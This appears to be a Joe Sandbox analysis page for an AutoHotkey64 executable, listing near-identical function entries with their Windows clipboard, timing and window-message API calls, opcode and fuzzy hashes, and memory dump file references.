Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64wcsncpy
String ID:
API String ID: 2569467992-0
Opcode ID: 9a44add650b498f23354164524a08afb52f0521ee5c142aa0b91ac0550cef95c
Instruction ID: b4cf9a48bba42d8552374b12e82d11b424b114356501fd4c4e8ef0a6a79cdd53
Opcode Fuzzy Hash: 9a44add650b498f23354164524a08afb52f0521ee5c142aa0b91ac0550cef95c
Instruction Fuzzy Hash: 84A171B1604B4486F7668B27E8843D937A1F78DBE4F11022AEB5963BF5DB38C490C745

Function 0000000140045283 Relevance: 9.2, APIs: 6, Instructions: 189windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: baa6b57e593adfff26728f7ad5c26b1c56aebbd656fa56ab0a8381f310e9de6e
Instruction ID: 5f2b21ebd160ed57cf7aa9facb7174f4188890186c576497f748b6bdda423da9
Opcode Fuzzy Hash: baa6b57e593adfff26728f7ad5c26b1c56aebbd656fa56ab0a8381f310e9de6e
Instruction Fuzzy Hash: 24A1C3B1604A4486FB668B27E4843E937A1F38DBE4F110226EB5963AF6DB78C490C705

Function 0000000140045334 Relevance: 9.2, APIs: 6, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 58c34ddb61d81573f2ced49cab1f85ae9c9b2ee807ee3b10dca0adddb2dbf865
Instruction ID: 4f8bfd6a7de64a7517045b21ee3b81a5f397817becfb1c561189b7d1ee89f326
Opcode Fuzzy Hash: 58c34ddb61d81573f2ced49cab1f85ae9c9b2ee807ee3b10dca0adddb2dbf865
Instruction Fuzzy Hash: 8E91B3B1604A4486FB668F27E4843E937A1F34DBE4F11022AFB5963AF6DB78C490C745

Function 00000001400457C5 Relevance: 9.2, APIs: 6, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140050830: wcsncpy.LIBCMT ref: 00000001400508EC

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockwcsncpy
String ID:
API String ID: 3258626421-0
Opcode ID: 760fe1ab978d5591e945c9e2b38011005cb85f47a96fbf608d5d64576460012e
Instruction ID: 27115be2ec3d13f8bd1271f702003049b9c6e74352228fdf091a7377afe9049b
Opcode Fuzzy Hash: 760fe1ab978d5591e945c9e2b38011005cb85f47a96fbf608d5d64576460012e
Instruction Fuzzy Hash: B3A191B1604B8486F7668B27E8843D937A1F38DBE4F11022AEB5963BF5DB38C490C745

Function 0000000140045810 Relevance: 9.2, APIs: 6, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140050830: wcsncpy.LIBCMT ref: 00000001400508EC

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockwcsncpy
String ID:
API String ID: 3258626421-0
Opcode ID: 67986fd81fd69e0decbb442996dad0bc3c193333c64035b675c50c75443a2735
Instruction ID: 405a714e6ad41adb9271037b07ee97e263970652b8ce4dcd2a047e6383872054
Opcode Fuzzy Hash: 67986fd81fd69e0decbb442996dad0bc3c193333c64035b675c50c75443a2735
Instruction Fuzzy Hash: E8A192B1604B4486F7668B27E4843D937A1F74DBE4F11022AEB5963BF5DB38C490C745

Function 00000001400443C5 Relevance: 9.2, APIs: 6, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140059140: SendMessageTimeoutW.USER32 ref: 00000001400591BD

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: 9692176c83f45cd6db3e04df79064d2ff68c338b3bbac2c6236a3bf500f66687
Instruction ID: d4e56e1ae051b8e1d928520fe75085db8496ef29211e4d45797ab0b50e314dc3
Opcode Fuzzy Hash: 9692176c83f45cd6db3e04df79064d2ff68c338b3bbac2c6236a3bf500f66687
Instruction Fuzzy Hash: 62A191B1604B4486FB668B27E8843D937A1F74DBE4F11022AEB5963BF5DB38C490C745

Function 00000001400445A7 Relevance: 9.2, APIs: 6, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 112302f8e6f02f18d67ef10f7bef36a9a198a52fc7fd22036925261ecb7a8036
Instruction ID: 8a7fef9aef4a8cc2a8c30ef695e34a3258d058aff77b5d5fa82d772c91648736
Opcode Fuzzy Hash: 112302f8e6f02f18d67ef10f7bef36a9a198a52fc7fd22036925261ecb7a8036
Instruction Fuzzy Hash: 95A191B1604B4486F7668B27E8843D937A1F74DBE4F11022AEB5963BF5DB38C490C745

Function 00000001400451E9 Relevance: 9.2, APIs: 6, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: bf20dd7cff7f046fa9858ba407802b8972348ce5e35732fabb97f493ebcdbb58
Instruction ID: bfb182ceb0d64a1854c620c278bfac69e2f6b9a6dbf394296d38661ff764b2fa
Opcode Fuzzy Hash: bf20dd7cff7f046fa9858ba407802b8972348ce5e35732fabb97f493ebcdbb58
Instruction Fuzzy Hash: 0C91C4B1604A4486FB668B27E4843E937E1F38DBE4F110226FB5963AF6DB78C490C745

Function 000000014004536E Relevance: 9.2, APIs: 6, Instructions: 187windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c641b41a666c38dc981492aba5723977b71c5c669428bdba5d50fccdf9d4dbd2
Instruction ID: 29d9079b71077ae8a1db6692932379d9ee499e6f305c12eaf2070a598d64bd97
Opcode Fuzzy Hash: c641b41a666c38dc981492aba5723977b71c5c669428bdba5d50fccdf9d4dbd2
Instruction Fuzzy Hash: 2D91C2B1604A4486FB668B27E4843E937E1F38DBE4F110226FB5963AF6DB78C490C705

Function 0000000140044102 Relevance: 9.2, APIs: 6, Instructions: 186windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140056F70: GetWindowRect.USER32 ref: 0000000140056FAF
Part of subcall function 0000000140056F70: MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001400440FD), ref: 0000000140057093

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
String ID:
API String ID: 1284534901-0
Opcode ID: f4be6a27163bf490b7ccde494232cc6559bc07d597c6e6615d22c46de803fffe
Instruction ID: 0c567b4fb7f72e61277447fbeebc078992c43bb171527e088da34b861dfc24e3
Opcode Fuzzy Hash: f4be6a27163bf490b7ccde494232cc6559bc07d597c6e6615d22c46de803fffe
Instruction Fuzzy Hash: 479192B1604A4486F7668B27E4843D937A1F38DBE4F11022AFB5963BF5DB38C491C745

Function 000000014004438B Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140058D70: GetWindowThreadProcessId.USER32 ref: 0000000140058DD4
Part of subcall function 0000000140058D70: AttachThreadInput.USER32 ref: 0000000140058E04
Part of subcall function 0000000140058D70: SetFocus.USER32 ref: 0000000140058E13
Part of subcall function 0000000140058D70: AttachThreadInput.USER32 ref: 00000001400590D4

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountThreadTick$AttachInput$ClipboardCloseFocusGlobalMessagePeekProcessUnlockWindow
String ID:
API String ID: 1514730375-0
Opcode ID: 03e11cc04717efa557bdf40bf129c4fa01f32154e871c8c5484ee52af34da06b
Instruction ID: ff7f48f40104166731518933dbc6f2ab8ce60b3f6ffa46cb231a46af26dda9d0
Opcode Fuzzy Hash: 03e11cc04717efa557bdf40bf129c4fa01f32154e871c8c5484ee52af34da06b
Instruction Fuzzy Hash: 699192B1604B4486F7668B27E4843E937A1F74DBE4F11022AEB5963BF6DB38C490C745

Function 000000014004440B Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400594E0: SendMessageTimeoutW.USER32 ref: 000000014005955E

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: fd26ad0380fd7f49a1396907d692802d5d766f95656a3af7414b52be1fb30957
Instruction ID: 2c3496d8dd2a86bb57b6543f4f4a3b77917ab0a826490a8f058eb4b45e04f2ee
Opcode Fuzzy Hash: fd26ad0380fd7f49a1396907d692802d5d766f95656a3af7414b52be1fb30957
Instruction Fuzzy Hash: EA9192B1604B4486F7668B27E4843E937A1F74DBE4F11022AEB5963BF6DB38C490C745

Function 00000001400446B4 Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 88b06261aa2fe6e3fd00d5cb6f81f7fba66be396762397e71b12f8761833e123
Instruction ID: d9508fc96df8176318ce9875f981df9b9c8f5b3a5846f5876bc72c2de74dcc8f
Opcode Fuzzy Hash: 88b06261aa2fe6e3fd00d5cb6f81f7fba66be396762397e71b12f8761833e123
Instruction Fuzzy Hash: 1C9191B1604B4486F7668B27E4843E937A1F74DBE4F11022AEB5963BF6DB38C490C745

Function 00000001400447F4 Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 2f26040a714e5049460f49170a43597dae6bd1816ec655175cc71a2fa69c2a18
Instruction ID: d64e929251e7b733f6db7896773ada4829671ef22d46af7a9b75de4615b85e60
Opcode Fuzzy Hash: 2f26040a714e5049460f49170a43597dae6bd1816ec655175cc71a2fa69c2a18
Instruction Fuzzy Hash: 2191A2B1604B8486F7668B27E4443D937A1F34DBE4F11022AEB5963BF6DB38C490C745

Function 0000000140045065 Relevance: 9.2, APIs: 6, Instructions: 185windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
